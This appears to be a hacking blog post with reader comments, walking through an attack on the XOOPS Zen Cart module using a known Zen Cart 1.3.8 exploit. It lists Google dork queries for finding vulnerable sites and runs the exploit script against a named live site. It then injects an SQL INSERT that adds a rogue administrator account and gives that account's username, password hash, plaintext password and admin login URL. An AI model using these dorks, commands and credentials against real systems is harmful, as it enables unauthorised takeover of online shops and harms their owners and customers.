XOOPS Module Zen Cart

This is an old bug from BlackH >> http://milw0rm.com/exploits/9005
It was written for Zen Cart version 1.3.8, but it works on the XOOPS Zen Cart module too.
lets go.. :p

Google dork

"powered by xoops" inurl:"modules/zox"
"powered by xoops" "zen cart"

Run the exploit from your shell

root@evilc0de:/home/noge# ./zen.py -url http://www.a-akinai.com/modules/zox
sql@jah$

Now try the show tables; command. If it succeeds, the target is exploitable.

sql@jah$ show tables;
>> success ( show tables; )

The command executed successfully.. but you can't see the table list, right?
Let's add an admin user to the database with this SQL command..

sql@jah$ INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, 'giant', 'admin@localhost', '617ec22fbb8f201c366e9848c0eb6925:87');
>> success ( INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, 'giant', 'admin@localhost', '617ec22fbb8f201c366e9848c0eb6925:87'); )

Admin added successfully.. now try logging in to the admin panel..

http://www.a-akinai.com/modules/zox/admin/login.php
username : giant
password : wew

Comments

Anonymous said…
nice info..
labatterie said…
The admin added successfully.. now try login to admin panel..
Golden Root said…
Great Blog, some really useful info